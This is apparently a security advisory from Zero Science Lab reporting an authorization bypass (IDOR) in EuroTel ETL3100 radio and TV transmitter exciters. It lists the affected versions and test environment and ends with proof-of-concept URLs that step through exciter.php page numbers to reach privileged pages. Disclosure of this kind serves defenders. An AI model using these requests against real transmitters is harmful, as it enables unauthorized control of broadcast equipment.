EuroTel ETL3100 Transmitter Authorization Bypass / Insecure Direct Object Reference

`  
EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)  
  
Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L  
Product web page: https://www.eurotel.it | https://www.siel.fm  
Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)   
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)  
  
  
Summary: RF Technology For Television Broadcasting Applications.  
The Series ETL3100 Radio Transmitter provides all the necessary  
features defined by the FM and DAB standards. Two bands are provided  
to easily complain with analog and digital DAB standard. The Series  
ETL3100 Television Transmitter provides all the necessary features  
defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as  
well as the analog TV standards. Three band are provided to easily  
complain with all standard channels, and switch softly from analog-TV  
'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.  
  
Desc: The application is vulnerable to insecure direct object references  
that occur when the application provides direct access to objects based  
on user-supplied input. As a result of this vulnerability attackers can  
bypass authorization and access the hidden resources on the system and  
execute privileged functionalities.  
  
Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2023-5783  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php  
  
  
29.04.2023  
  
--  
  
  
See URL:  
  
TARGET/exciter.php?page=0  
TARGET/exciter.php?page=1  
TARGET/exciter.php?page=2  
...  
...  
TARGET/exciter.php?page=29  
TARGET/exciter.php?page=30  
TARGET/exciter.php?page=31  
`